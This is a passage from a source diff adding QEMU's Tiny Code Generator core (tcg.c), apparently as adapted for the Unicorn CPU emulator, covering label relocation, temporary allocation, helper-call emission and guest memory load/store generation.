OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +/* define it to use liveness analysis (better code) */ +#define USE_LIVENESS_ANALYSIS +#define USE_TCG_OPTIMIZATIONS + +#include "config.h" + +/* Define to jump the ELF file used to communicate with GDB. */ +#undef DEBUG_JIT + +#if !defined(CONFIG_DEBUG_TCG) && !defined(NDEBUG) +/* define it to suppress various consistency checks (faster) */ +#define NDEBUG +#endif + +#include "qemu-common.h" +#include "qemu/host-utils.h" +#include "qemu/timer.h" + +/* Note: the long term plan is to reduce the dependencies on the QEMU + CPU definitions. Currently they are used for qemu_ld/st + instructions */ +#define NO_CPU_IO_DEFS +#include "cpu.h" + +#include "tcg-op.h" + +#if UINTPTR_MAX == UINT32_MAX +# define ELF_CLASS ELFCLASS32 +#else +# define ELF_CLASS ELFCLASS64 +#endif +#ifdef HOST_WORDS_BIGENDIAN +# define ELF_DATA ELFDATA2MSB +#else +# define ELF_DATA ELFDATA2LSB +#endif + +#include "elf.h" + +/* Forward declarations for functions declared in tcg-target.c and used here. */ +static void tcg_target_init(TCGContext *s); +static void tcg_target_qemu_prologue(TCGContext *s); +static void patch_reloc(tcg_insn_unit *code_ptr, int type, + intptr_t value, intptr_t addend); + +/* The CIE and FDE header definitions will be common to all hosts. */ +typedef struct { + //uint32_t QEMU_ALIGN(sizeof(void *), len); + uint32_t QEMU_ALIGN(8, len); + uint32_t id; + uint8_t version; + char augmentation[1]; + uint8_t code_align; + uint8_t data_align; + uint8_t return_column; +} DebugFrameCIE; + +QEMU_PACK( typedef struct { +// uint32_t QEMU_ALIGN(sizeof(void *), len); + uint32_t QEMU_ALIGN(8, len); + uint32_t cie_offset; + uintptr_t func_start; + uintptr_t func_len; +}) DebugFrameFDEHeader; + +QEMU_PACK( typedef struct { + DebugFrameCIE cie; + DebugFrameFDEHeader fde; +}) DebugFrameHeader; + +/* Forward declarations for functions declared and used in tcg-target.c. */ +static int target_parse_constraint(TCGArgConstraint *ct, const char **pct_str); +static void tcg_out_ld(TCGContext *s, TCGType type, TCGReg ret, TCGReg arg1, + intptr_t arg2); +static void tcg_out_mov(TCGContext *s, TCGType type, TCGReg ret, TCGReg arg); +static void tcg_out_movi(TCGContext *s, TCGType type, + TCGReg ret, tcg_target_long arg); +static void tcg_out_op(TCGContext *s, TCGOpcode opc, const TCGArg *args, + const int *const_args); +static void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg, TCGReg arg1, + intptr_t arg2); +static void tcg_out_call(TCGContext *s, tcg_insn_unit *target); +static int tcg_target_const_match(tcg_target_long val, TCGType type, + const TCGArgConstraint *arg_ct); +static void tcg_out_tb_init(TCGContext *s); +static void tcg_out_tb_finalize(TCGContext *s); + + +TCGOpDef tcg_op_defs_org[] = { +#define DEF(s, oargs, iargs, cargs, flags) { #s, oargs, iargs, cargs, iargs + oargs + cargs, flags }, +#include "tcg-opc.h" +#undef DEF +}; + +#if TCG_TARGET_INSN_UNIT_SIZE == 1 +static QEMU_UNUSED_FUNC inline void tcg_out8(TCGContext *s, uint8_t v) +{ + *s->code_ptr++ = v; +} + +static QEMU_UNUSED_FUNC inline void tcg_patch8(tcg_insn_unit *p, + uint8_t v) +{ + *p = v; +} +#endif + +#if TCG_TARGET_INSN_UNIT_SIZE <= 2 +static QEMU_UNUSED_FUNC inline void tcg_out16(TCGContext *s, uint16_t v) +{ + if (TCG_TARGET_INSN_UNIT_SIZE == 2) { + *s->code_ptr++ = (tcg_insn_unit)v; + } else { + tcg_insn_unit *p = s->code_ptr; + memcpy(p, &v, sizeof(v)); + s->code_ptr = p + (2 / TCG_TARGET_INSN_UNIT_SIZE); + } +} + +static QEMU_UNUSED_FUNC inline void tcg_patch16(tcg_insn_unit *p, + uint16_t v) +{ + if (TCG_TARGET_INSN_UNIT_SIZE == 2) { + *p = (tcg_insn_unit)v; + } else { + memcpy(p, &v, sizeof(v)); + } +} +#endif + +#if TCG_TARGET_INSN_UNIT_SIZE <= 4 +static QEMU_UNUSED_FUNC inline void tcg_out32(TCGContext *s, uint32_t v) +{ + if (TCG_TARGET_INSN_UNIT_SIZE == 4) { + *s->code_ptr++ = v; + } else { + tcg_insn_unit *p = s->code_ptr; + memcpy(p, &v, sizeof(v)); + s->code_ptr = p + (4 / TCG_TARGET_INSN_UNIT_SIZE); + } +} + +static QEMU_UNUSED_FUNC inline void tcg_patch32(tcg_insn_unit *p, + uint32_t v) +{ + if (TCG_TARGET_INSN_UNIT_SIZE == 4) { + *p = v; + } else { + memcpy(p, &v, sizeof(v)); + } +} +#endif + +#if TCG_TARGET_INSN_UNIT_SIZE <= 8 +static QEMU_UNUSED_FUNC inline void tcg_out64(TCGContext *s, uint64_t v) +{ + if (TCG_TARGET_INSN_UNIT_SIZE == 8) { + *s->code_ptr++ = (tcg_insn_unit)v; + } else { + tcg_insn_unit *p = s->code_ptr; + memcpy(p, &v, sizeof(v)); + s->code_ptr = p + (8 / TCG_TARGET_INSN_UNIT_SIZE); + } +} + +static QEMU_UNUSED_FUNC inline void tcg_patch64(tcg_insn_unit *p, + uint64_t v) +{ + if (TCG_TARGET_INSN_UNIT_SIZE == 8) { + *p = (tcg_insn_unit)v; + } else { + memcpy(p, &v, sizeof(v)); + } +} +#endif + +/* label relocation processing */ + +static void tcg_out_reloc(TCGContext *s, tcg_insn_unit *code_ptr, int type, + int label_index, intptr_t addend) +{ + TCGLabel *l; + TCGRelocation *r; + + l = &s->labels[label_index]; + if (l->has_value) { + /* FIXME: This may break relocations on RISC targets that + modify instruction fields in place. The caller may not have + written the initial value. */ + patch_reloc(code_ptr, type, l->u.value, addend); + } else { + /* add a new relocation entry */ + r = tcg_malloc(s, sizeof(TCGRelocation)); + r->type = type; + r->ptr = code_ptr; + r->addend = addend; + r->next = l->u.first_reloc; + l->u.first_reloc = r; + } +} + +static void tcg_out_label(TCGContext *s, int label_index, tcg_insn_unit *ptr) +{ + TCGLabel *l = &s->labels[label_index]; + intptr_t value = (intptr_t)ptr; + TCGRelocation *r; + + assert(!l->has_value); + + for (r = l->u.first_reloc; r != NULL; r = r->next) { + patch_reloc(r->ptr, r->type, value, r->addend); + } + + l->has_value = 1; + l->u.value_ptr = ptr; +} + +int gen_new_label(TCGContext *s) +{ + int idx; + TCGLabel *l; + + if (s->nb_labels >= TCG_MAX_LABELS) + tcg_abort(); + idx = s->nb_labels++; + l = &s->labels[idx]; + l->has_value = 0; + l->u.first_reloc = NULL; + return idx; +} + +#include "tcg-target.c" + +/* pool based memory allocation */ +void *tcg_malloc_internal(TCGContext *s, int size) +{ + TCGPool *p; + int pool_size; + + if (size > TCG_POOL_CHUNK_SIZE) { + /* big malloc: insert a new pool (XXX: could optimize) */ + p = g_malloc0(sizeof(TCGPool) + size); + p->size = size; + p->next = s->pool_first_large; + s->pool_first_large = p; + return p->data; + } else { + p = s->pool_current; + if (!p) { + p = s->pool_first; + if (!p) + goto new_pool; + } else { + if (!p->next) { + new_pool: + pool_size = TCG_POOL_CHUNK_SIZE; + p = g_malloc0(sizeof(TCGPool) + pool_size); + p->size = pool_size; + p->next = NULL; + if (s->pool_current) + s->pool_current->next = p; + else + s->pool_first = p; + } else { + p = p->next; + } + } + } + s->pool_current = p; + s->pool_cur = p->data + size; + s->pool_end = p->data + p->size; + return p->data; +} + +void tcg_pool_reset(TCGContext *s) +{ + TCGPool *p, *t; + for (p = s->pool_first_large; p; p = t) { + t = p->next; + g_free(p); + } + s->pool_first_large = NULL; + s->pool_cur = s->pool_end = NULL; + s->pool_current = NULL; +} + +typedef struct TCGHelperInfo { + void *func; + const char *name; + unsigned flags; + unsigned sizemask; +} TCGHelperInfo; + +#include "exec/helper-proto.h" + +static const TCGHelperInfo all_helpers[] = { +#include "exec/helper-tcg.h" +}; + +void tcg_context_init(TCGContext *s) +{ + int op, total_args, n, i; + TCGOpDef *def; + TCGArgConstraint *args_ct; + int *sorted_args; + GHashTable *helper_table; + + memset(s, 0, sizeof(*s)); + s->nb_globals = 0; + + // copy original tcg_op_defs_org for private usage + s->tcg_op_defs = g_malloc(sizeof(tcg_op_defs_org)); + memcpy(s->tcg_op_defs, tcg_op_defs_org, sizeof(tcg_op_defs_org)); + + /* Count total number of arguments and allocate the corresponding + space */ + total_args = 0; + for(op = 0; op < NB_OPS; op++) { + def = &s->tcg_op_defs[op]; + n = def->nb_iargs + def->nb_oargs; + total_args += n; + } + + args_ct = g_malloc(sizeof(TCGArgConstraint) * total_args); + sorted_args = g_malloc(sizeof(int) * total_args); + + for(op = 0; op < NB_OPS; op++) { + def = &s->tcg_op_defs[op]; + def->args_ct = args_ct; + def->sorted_args = sorted_args; + n = def->nb_iargs + def->nb_oargs; + sorted_args += n; + args_ct += n; + } + + /* Register helpers. */ + /* Use g_direct_hash/equal for direct pointer comparisons on func. */ + s->helpers = helper_table = g_hash_table_new(NULL, NULL); + + for (i = 0; i < ARRAY_SIZE(all_helpers); ++i) { + g_hash_table_insert(helper_table, (gpointer)all_helpers[i].func, + (gpointer)&all_helpers[i]); + } + + tcg_target_init(s); +} + +void tcg_prologue_init(TCGContext *s) +{ + /* init global prologue and epilogue */ + s->code_buf = s->code_gen_prologue; + s->code_ptr = s->code_buf; + tcg_target_qemu_prologue(s); + flush_icache_range((uintptr_t)s->code_buf, (uintptr_t)s->code_ptr); + +#ifdef DEBUG_DISAS + if (qemu_loglevel_mask(CPU_LOG_TB_OUT_ASM)) { + size_t size = tcg_current_code_size(s); + qemu_log("PROLOGUE: [size=%zu]\n", size); + qemu_log("\n"); + qemu_log_flush(); + } +#endif +} + +void tcg_set_frame(TCGContext *s, int reg, intptr_t start, intptr_t size) +{ + s->frame_start = start; + s->frame_end = start + size; + s->frame_reg = reg; +} + +void tcg_func_start(TCGContext *s) +{ + tcg_pool_reset(s); + s->nb_temps = s->nb_globals; + + /* No temps have been previously allocated for size or locality. */ + memset(s->free_temps, 0, sizeof(s->free_temps)); + + s->labels = tcg_malloc(s, sizeof(TCGLabel) * TCG_MAX_LABELS); + s->nb_labels = 0; + s->current_frame_offset = s->frame_start; + +#ifdef CONFIG_DEBUG_TCG + s->goto_tb_issue_mask = 0; +#endif + + s->gen_opc_ptr = s->gen_opc_buf; + s->gen_opparam_ptr = s->gen_opparam_buf; + + s->be = tcg_malloc(s, sizeof(TCGBackendData)); +} + +static inline void tcg_temp_alloc(TCGContext *s, int n) +{ + if (n > TCG_MAX_TEMPS) + tcg_abort(); +} + +static inline int tcg_global_reg_new_internal(TCGContext *s, TCGType type, int reg, + const char *name) +{ + TCGTemp *ts; + int idx; + +#if TCG_TARGET_REG_BITS == 32 + if (type != TCG_TYPE_I32) + tcg_abort(); +#endif + if (tcg_regset_test_reg(s->reserved_regs, reg)) + tcg_abort(); + idx = s->nb_globals; + tcg_temp_alloc(s, s->nb_globals + 1); + ts = &s->temps[s->nb_globals]; + ts->base_type = type; + ts->type = type; + ts->fixed_reg = 1; + ts->reg = reg; + ts->name = name; + s->nb_globals++; + tcg_regset_set_reg(s->reserved_regs, reg); + return idx; +} + +TCGv_i32 tcg_global_reg_new_i32(TCGContext *s, int reg, const char *name) +{ + int idx; + + idx = tcg_global_reg_new_internal(s, TCG_TYPE_I32, reg, name); + return MAKE_TCGV_I32(idx); +} + +TCGv_i64 tcg_global_reg_new_i64(TCGContext *s, int reg, const char *name) +{ + int idx; + + idx = tcg_global_reg_new_internal(s, TCG_TYPE_I64, reg, name); + return MAKE_TCGV_I64(idx); +} + +static inline int tcg_global_mem_new_internal(TCGContext *s, TCGType type, int reg, + intptr_t offset, + const char *name) +{ + TCGTemp *ts; + int idx; + + idx = s->nb_globals; +#if TCG_TARGET_REG_BITS == 32 + if (type == TCG_TYPE_I64) { + char buf[64]; + tcg_temp_alloc(s, s->nb_globals + 2); + ts = &s->temps[s->nb_globals]; + ts->base_type = type; + ts->type = TCG_TYPE_I32; + ts->fixed_reg = 0; + ts->mem_allocated = 1; + ts->mem_reg = reg; +#ifdef HOST_WORDS_BIGENDIAN + ts->mem_offset = offset + 4; +#else + ts->mem_offset = offset; +#endif + pstrcpy(buf, sizeof(buf), name); + pstrcat(buf, sizeof(buf), "_0"); + ts->name = g_strdup(buf); + ts++; + + ts->base_type = type; + ts->type = TCG_TYPE_I32; + ts->fixed_reg = 0; + ts->mem_allocated = 1; + ts->mem_reg = reg; +#ifdef HOST_WORDS_BIGENDIAN + ts->mem_offset = offset; +#else + ts->mem_offset = offset + 4; +#endif + pstrcpy(buf, sizeof(buf), name); + pstrcat(buf, sizeof(buf), "_1"); + ts->name = g_strdup(buf); + + s->nb_globals += 2; + } else +#endif + { + tcg_temp_alloc(s, s->nb_globals + 1); + ts = &s->temps[s->nb_globals]; + ts->base_type = type; + ts->type = type; + ts->fixed_reg = 0; + ts->mem_allocated = 1; + ts->mem_reg = reg; + ts->mem_offset = offset; + ts->name = name; + s->nb_globals++; + } + return idx; +} + +TCGv_i32 tcg_global_mem_new_i32(TCGContext *s, int reg, intptr_t offset, const char *name) +{ + int idx = tcg_global_mem_new_internal(s, TCG_TYPE_I32, reg, offset, name); + return MAKE_TCGV_I32(idx); +} + +TCGv_i64 tcg_global_mem_new_i64(TCGContext *s, int reg, intptr_t offset, const char *name) +{ + int idx = tcg_global_mem_new_internal(s, TCG_TYPE_I64, reg, offset, name); + return MAKE_TCGV_I64(idx); +} + +static inline int tcg_temp_new_internal(TCGContext *s, TCGType type, int temp_local) +{ + TCGTemp *ts; + int idx, k; + + k = type + (temp_local ? TCG_TYPE_COUNT : 0); + idx = find_first_bit(s->free_temps[k].l, TCG_MAX_TEMPS); + if (idx < TCG_MAX_TEMPS) { + /* There is already an available temp with the right type. */ + clear_bit(idx, s->free_temps[k].l); + + ts = &s->temps[idx]; + ts->temp_allocated = 1; + assert(ts->base_type == type); + assert(ts->temp_local == temp_local); + } else { + idx = s->nb_temps; +#if TCG_TARGET_REG_BITS == 32 + if (type == TCG_TYPE_I64) { + tcg_temp_alloc(s, s->nb_temps + 2); + ts = &s->temps[s->nb_temps]; + ts->base_type = type; + ts->type = TCG_TYPE_I32; + ts->temp_allocated = 1; + ts->temp_local = temp_local; + ts->name = NULL; + ts++; + ts->base_type = type; + ts->type = TCG_TYPE_I32; + ts->temp_allocated = 1; + ts->temp_local = temp_local; + ts->name = NULL; + s->nb_temps += 2; + } else +#endif + { + tcg_temp_alloc(s, s->nb_temps + 1); + ts = &s->temps[s->nb_temps]; + ts->base_type = type; + ts->type = type; + ts->temp_allocated = 1; + ts->temp_local = temp_local; + ts->name = NULL; + s->nb_temps++; + } + } + +#if defined(CONFIG_DEBUG_TCG) + s->temps_in_use++; +#endif + return idx; +} + +TCGv_i32 tcg_temp_new_internal_i32(TCGContext *s, int temp_local) +{ + int idx; + + idx = tcg_temp_new_internal(s, TCG_TYPE_I32, temp_local); + return MAKE_TCGV_I32(idx); +} + +TCGv_i64 tcg_temp_new_internal_i64(TCGContext *s, int temp_local) +{ + int idx; + + idx = tcg_temp_new_internal(s, TCG_TYPE_I64, temp_local); + return MAKE_TCGV_I64(idx); +} + +static void tcg_temp_free_internal(TCGContext *s, int idx) +{ + TCGTemp *ts; + int k; + +#if defined(CONFIG_DEBUG_TCG) + s->temps_in_use--; + if (s->temps_in_use < 0) { + fprintf(stderr, "More temporaries freed than allocated!\n"); + } +#endif + + assert(idx >= s->nb_globals && idx < s->nb_temps); + ts = &s->temps[idx]; + assert(ts->temp_allocated != 0); + ts->temp_allocated = 0; + + k = ts->base_type + (ts->temp_local ? TCG_TYPE_COUNT : 0); + set_bit(idx, s->free_temps[k].l); +} + +void tcg_temp_free_i32(TCGContext *s, TCGv_i32 arg) +{ + tcg_temp_free_internal(s, GET_TCGV_I32(arg)); +} + +void tcg_temp_free_i64(TCGContext *s, TCGv_i64 arg) +{ + tcg_temp_free_internal(s, GET_TCGV_I64(arg)); +} + +TCGv_i32 tcg_const_i32(TCGContext *s, int32_t val) +{ + TCGv_i32 t0; + t0 = tcg_temp_new_i32(s); + tcg_gen_movi_i32(s, t0, val); + return t0; +} + +TCGv_i64 tcg_const_i64(TCGContext *s, int64_t val) +{ + TCGv_i64 t0; + t0 = tcg_temp_new_i64(s); + tcg_gen_movi_i64(s, t0, val); + return t0; +} + +TCGv_i32 tcg_const_local_i32(TCGContext *s, int32_t val) +{ + TCGv_i32 t0; + t0 = tcg_temp_local_new_i32(s); + tcg_gen_movi_i32(s, t0, val); + return t0; +} + +TCGv_i64 tcg_const_local_i64(TCGContext *s, int64_t val) +{ + TCGv_i64 t0; + t0 = tcg_temp_local_new_i64(s); + tcg_gen_movi_i64(s, t0, val); + return t0; +} + +#if defined(CONFIG_DEBUG_TCG) +void tcg_clear_temp_count(TCGContext *s) +{ + s->temps_in_use = 0; +} + +int tcg_check_temp_count(TCGContext *s) +{ + if (s->temps_in_use) { + /* Clear the count so that we don't give another + * warning immediately next time around. + */ + s->temps_in_use = 0; + return 1; + } + return 0; +} +#endif + +/* Note: we convert the 64 bit args to 32 bit and do some alignment + and endian swap. Maybe it would be better to do the alignment + and endian swap in tcg_reg_alloc_call(). */ +void tcg_gen_callN(TCGContext *s, void *func, TCGArg ret, + int nargs, TCGArg *args) +{ + int i, real_args, nb_rets; + unsigned sizemask, flags; + TCGArg *nparam; + TCGHelperInfo *info; + + info = g_hash_table_lookup(s->helpers, (gpointer)func); + flags = info->flags; + sizemask = info->sizemask; + +#if defined(__sparc__) && !defined(__arch64__) \ + && !defined(CONFIG_TCG_INTERPRETER) + /* We have 64-bit values in one register, but need to pass as two + separate parameters. Split them. */ + int orig_sizemask = sizemask; + int orig_nargs = nargs; + TCGv_i64 retl, reth; + + TCGV_UNUSED_I64(retl); + TCGV_UNUSED_I64(reth); + if (sizemask != 0) { + TCGArg *split_args = __builtin_alloca(sizeof(TCGArg) * nargs * 2); + for (i = real_args = 0; i < nargs; ++i) { + int is_64bit = sizemask & (1 << (i+1)*2); + if (is_64bit) { + TCGv_i64 orig = MAKE_TCGV_I64(args[i]); + TCGv_i32 h = tcg_temp_new_i32(s); + TCGv_i32 l = tcg_temp_new_i32(s); + tcg_gen_extr_i64_i32(l, h, orig); + split_args[real_args++] = GET_TCGV_I32(h); + split_args[real_args++] = GET_TCGV_I32(l); + } else { + split_args[real_args++] = args[i]; + } + } + nargs = real_args; + args = split_args; + sizemask = 0; + } +#elif defined(TCG_TARGET_EXTEND_ARGS) && TCG_TARGET_REG_BITS == 64 + for (i = 0; i < nargs; ++i) { + int is_64bit = sizemask & (1 << (i+1)*2); + int is_signed = sizemask & (2 << (i+1)*2); + if (!is_64bit) { + TCGv_i64 temp = tcg_temp_new_i64(s); + TCGv_i64 orig = MAKE_TCGV_I64(args[i]); + if (is_signed) { + tcg_gen_ext32s_i64(s, temp, orig); + } else { + tcg_gen_ext32u_i64(s, temp, orig); + } + args[i] = GET_TCGV_I64(temp); + } + } +#endif /* TCG_TARGET_EXTEND_ARGS */ + + *s->gen_opc_ptr++ = INDEX_op_call; + nparam = s->gen_opparam_ptr++; + if (ret != TCG_CALL_DUMMY_ARG) { +#if defined(__sparc__) && !defined(__arch64__) \ + && !defined(CONFIG_TCG_INTERPRETER) + if (orig_sizemask & 1) { + /* The 32-bit ABI is going to return the 64-bit value in + the %o0/%o1 register pair. Prepare for this by using + two return temporaries, and reassemble below. */ + retl = tcg_temp_new_i64(s); + reth = tcg_temp_new_i64(s); + *s->gen_opparam_ptr++ = GET_TCGV_I64(reth); + *s->gen_opparam_ptr++ = GET_TCGV_I64(retl); + nb_rets = 2; + } else { + *s->gen_opparam_ptr++ = ret; + nb_rets = 1; + } +#else + if (TCG_TARGET_REG_BITS < 64 && (sizemask & 1)) { +#ifdef HOST_WORDS_BIGENDIAN + *s->gen_opparam_ptr++ = ret + 1; + *s->gen_opparam_ptr++ = ret; +#else + *s->gen_opparam_ptr++ = ret; + *s->gen_opparam_ptr++ = ret + 1; +#endif + nb_rets = 2; + } else { + *s->gen_opparam_ptr++ = ret; + nb_rets = 1; + } +#endif + } else { + nb_rets = 0; + } + real_args = 0; + for (i = 0; i < nargs; i++) { + int is_64bit = sizemask & (1 << (i+1)*2); + if (TCG_TARGET_REG_BITS < 64 && is_64bit) { +#ifdef TCG_TARGET_CALL_ALIGN_ARGS + /* some targets want aligned 64 bit args */ + if (real_args & 1) { + *s->gen_opparam_ptr++ = TCG_CALL_DUMMY_ARG; + real_args++; + } +#endif + /* If stack grows up, then we will be placing successive + arguments at lower addresses, which means we need to + reverse the order compared to how we would normally + treat either big or little-endian. For those arguments + that will wind up in registers, this still works for + HPPA (the only current STACK_GROWSUP target) since the + argument registers are *also* allocated in decreasing + order. If another such target is added, this logic may + have to get more complicated to differentiate between + stack arguments and register arguments. */ +#if defined(HOST_WORDS_BIGENDIAN) != defined(TCG_TARGET_STACK_GROWSUP) + *s->gen_opparam_ptr++ = args[i] + 1; + *s->gen_opparam_ptr++ = args[i]; +#else + *s->gen_opparam_ptr++ = args[i]; + *s->gen_opparam_ptr++ = args[i] + 1; +#endif + real_args += 2; + continue; + } + + *s->gen_opparam_ptr++ = args[i]; + real_args++; + } + *s->gen_opparam_ptr++ = (uintptr_t)func; + *s->gen_opparam_ptr++ = flags; + + *nparam = (nb_rets << 16) | real_args; + + /* total parameters, needed to go backward in the instruction stream */ + *s->gen_opparam_ptr++ = 1 + nb_rets + real_args + 3; + +#if defined(__sparc__) && !defined(__arch64__) \ + && !defined(CONFIG_TCG_INTERPRETER) + /* Free all of the parts we allocated above. */ + for (i = real_args = 0; i < orig_nargs; ++i) { + int is_64bit = orig_sizemask & (1 << (i+1)*2); + if (is_64bit) { + TCGv_i32 h = MAKE_TCGV_I32(args[real_args++]); + TCGv_i32 l = MAKE_TCGV_I32(args[real_args++]); + tcg_temp_free_i32(s, h); + tcg_temp_free_i32(s, l); + } else { + real_args++; + } + } + if (orig_sizemask & 1) { + /* The 32-bit ABI returned two 32-bit pieces. Re-assemble them. + Note that describing these as TCGv_i64 eliminates an unnecessary + zero-extension that tcg_gen_concat_i32_i64 would create. */ + tcg_gen_concat32_i64(MAKE_TCGV_I64(ret), retl, reth); + tcg_temp_free_i64(s, retl); + tcg_temp_free_i64(s, reth); + } +#elif defined(TCG_TARGET_EXTEND_ARGS) && TCG_TARGET_REG_BITS == 64 + for (i = 0; i < nargs; ++i) { + int is_64bit = sizemask & (1 << (i+1)*2); + if (!is_64bit) { + TCGv_i64 temp = MAKE_TCGV_I64(args[i]); + tcg_temp_free_i64(s, temp); + } + } +#endif /* TCG_TARGET_EXTEND_ARGS */ +} + +#if TCG_TARGET_REG_BITS == 32 +void tcg_gen_shifti_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, + int c, int right, int arith) +{ + if (c == 0) { + tcg_gen_mov_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1)); + tcg_gen_mov_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1)); + } else if (c >= 32) { + c -= 32; + if (right) { + if (arith) { + tcg_gen_sari_i32(s, TCGV_LOW(ret), TCGV_HIGH(arg1), c); + tcg_gen_sari_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), 31); + } else { + tcg_gen_shri_i32(s, TCGV_LOW(ret), TCGV_HIGH(arg1), c); + tcg_gen_movi_i32(s, TCGV_HIGH(ret), 0); + } + } else { + tcg_gen_shli_i32(s, TCGV_HIGH(ret), TCGV_LOW(arg1), c); + tcg_gen_movi_i32(s, TCGV_LOW(ret), 0); + } + } else { + TCGv_i32 t0, t1; + + t0 = tcg_temp_new_i32(s); + t1 = tcg_temp_new_i32(s); + if (right) { + tcg_gen_shli_i32(s, t0, TCGV_HIGH(arg1), 32 - c); + if (arith) + tcg_gen_sari_i32(s, t1, TCGV_HIGH(arg1), c); + else + tcg_gen_shri_i32(s, t1, TCGV_HIGH(arg1), c); + tcg_gen_shri_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1), c); + tcg_gen_or_i32(s, TCGV_LOW(ret), TCGV_LOW(ret), t0); + tcg_gen_mov_i32(s, TCGV_HIGH(ret), t1); + } else { + tcg_gen_shri_i32(s, t0, TCGV_LOW(arg1), 32 - c); + /* Note: ret can be the same as arg1, so we use t1 */ + tcg_gen_shli_i32(s, t1, TCGV_LOW(arg1), c); + tcg_gen_shli_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), c); + tcg_gen_or_i32(s, TCGV_HIGH(ret), TCGV_HIGH(ret), t0); + tcg_gen_mov_i32(s, TCGV_LOW(ret), t1); + } + tcg_temp_free_i32(s, t0); + tcg_temp_free_i32(s, t1); + } +} +#endif + +static inline TCGMemOp tcg_canonicalize_memop(TCGMemOp op, bool is64, bool st) +{ + switch (op & MO_SIZE) { + case MO_8: + op &= ~MO_BSWAP; + break; + case MO_16: + break; + case MO_32: + if (!is64) { + op &= ~MO_SIGN; + } + break; + case MO_64: + if (!is64) { + tcg_abort(); + } + break; + } + if (st) { + op &= ~MO_SIGN; + } + return op; +} + +// Unicorn engine +// check if the last memory access was invalid +// if so, we jump to the block epilogue to quit immediately. +void check_exit_request(TCGContext *tcg_ctx) +{ + TCGv_i32 flag; + + flag = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ld_i32(tcg_ctx, flag, tcg_ctx->cpu_env, + offsetof(CPUState, tcg_exit_req) - ENV_OFFSET); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, flag, 0, tcg_ctx->exitreq_label); + tcg_temp_free_i32(tcg_ctx, flag); +} + +void tcg_gen_qemu_ld_i32(struct uc_struct *uc, TCGv_i32 val, TCGv addr, TCGArg idx, TCGMemOp memop) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + + memop = tcg_canonicalize_memop(memop, 0, 0); + + *tcg_ctx->gen_opc_ptr++ = INDEX_op_qemu_ld_i32; + tcg_add_param_i32(tcg_ctx, val); + tcg_add_param_tl(tcg_ctx, addr); + *tcg_ctx->gen_opparam_ptr++ = memop; + *tcg_ctx->gen_opparam_ptr++ = idx; + + check_exit_request(tcg_ctx); +} + +void tcg_gen_qemu_st_i32(struct uc_struct *uc, TCGv_i32 val, TCGv addr, TCGArg idx, TCGMemOp memop) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + + memop = tcg_canonicalize_memop(memop, 0, 1); + + *tcg_ctx->gen_opc_ptr++ = INDEX_op_qemu_st_i32; + tcg_add_param_i32(tcg_ctx, val); + tcg_add_param_tl(tcg_ctx, addr); + *tcg_ctx->gen_opparam_ptr++ = memop; + *tcg_ctx->gen_opparam_ptr++ = idx; + + check_exit_request(tcg_ctx); +} + +void tcg_gen_qemu_ld_i64(struct uc_struct *uc, TCGv_i64 val, TCGv addr, TCGArg idx, TCGMemOp memop) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + + memop = tcg_canonicalize_memop(memop, 1, 0); + +#if TCG_TARGET_REG_BITS == 32 + if ((memop & MO_SIZE) < MO_64) { + tcg_gen_qemu_ld_i32(uc, TCGV_LOW(val), addr, idx, memop); + if (memop & MO_SIGN) { + tcg_gen_sari_i32(tcg_ctx, TCGV_HIGH(val), TCGV_LOW(val), 31); + } else { + tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(val), 0); + } + + check_exit_request(tcg_ctx); + return; + } +#endif + + *tcg_ctx->gen_opc_ptr++ = INDEX_op_qemu_ld_i64; + tcg_add_param_i64(tcg_ctx, val); + tcg_add_param_tl(tcg_ctx, addr); + *tcg_ctx->gen_opparam_ptr++ = memop; + *tcg_ctx->gen_opparam_ptr++ = idx; + + check_exit_request(tcg_ctx); +} + +void tcg_gen_qemu_st_i64(struct uc_struct *uc, TCGv_i64 val, TCGv addr, TCGArg idx, TCGMemOp memop) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + + memop = tcg_canonicalize_memop(memop, 1, 1); + +#if TCG_TARGET_REG_BITS == 32 + if ((memop & MO_SIZE) < MO_64) { + tcg_gen_qemu_st_i32(uc, TCGV_LOW(val), addr, idx, memop); + check_exit_request(tcg_ctx); + return; + } +#endif + + *tcg_ctx->gen_opc_ptr++ = INDEX_op_qemu_st_i64; + tcg_add_param_i64(tcg_ctx, val); + tcg_add_param_tl(tcg_ctx, addr); + *tcg_ctx->gen_opparam_ptr++ = memop; + *tcg_ctx->gen_opparam_ptr++ = idx; + + check_exit_request(tcg_ctx); +} + +static void tcg_reg_alloc_start(TCGContext *s) +{ + int i; + TCGTemp *ts; + for(i = 0; i < s->nb_globals; i++) { + ts = &s->temps[i]; + if (ts->fixed_reg) { + ts->val_type = TEMP_VAL_REG; + } else { + ts->val_type = TEMP_VAL_MEM; + } + } + for(i = s->nb_globals; i < s->nb_temps; i++) { + ts = &s->temps[i]; + if (ts->temp_local) { + ts->val_type = TEMP_VAL_MEM; + } else { + ts->val_type = TEMP_VAL_DEAD; + } + ts->mem_allocated = 0; + ts->fixed_reg = 0; + } + for(i = 0; i < TCG_TARGET_NB_REGS; i++) { + s->reg_to_temp[i] = -1; + } +} + +static char *tcg_get_arg_str_idx(TCGContext *s, char *buf, int buf_size, + int idx) +{ + TCGTemp *ts; + + assert(idx >= 0 && idx < s->nb_temps); + ts = &s->temps[idx]; + if (idx < s->nb_globals) { + pstrcpy(buf, buf_size, ts->name); + } else { + if (ts->temp_local) + snprintf(buf, buf_size, "loc%d", idx - s->nb_globals); + else + snprintf(buf, buf_size, "tmp%d", idx - s->nb_globals); + } + return buf; +} + +char *tcg_get_arg_str_i32(TCGContext *s, char *buf, int buf_size, TCGv_i32 arg) +{ + return tcg_get_arg_str_idx(s, buf, buf_size, GET_TCGV_I32(arg)); +} + +char *tcg_get_arg_str_i64(TCGContext *s, char *buf, int buf_size, 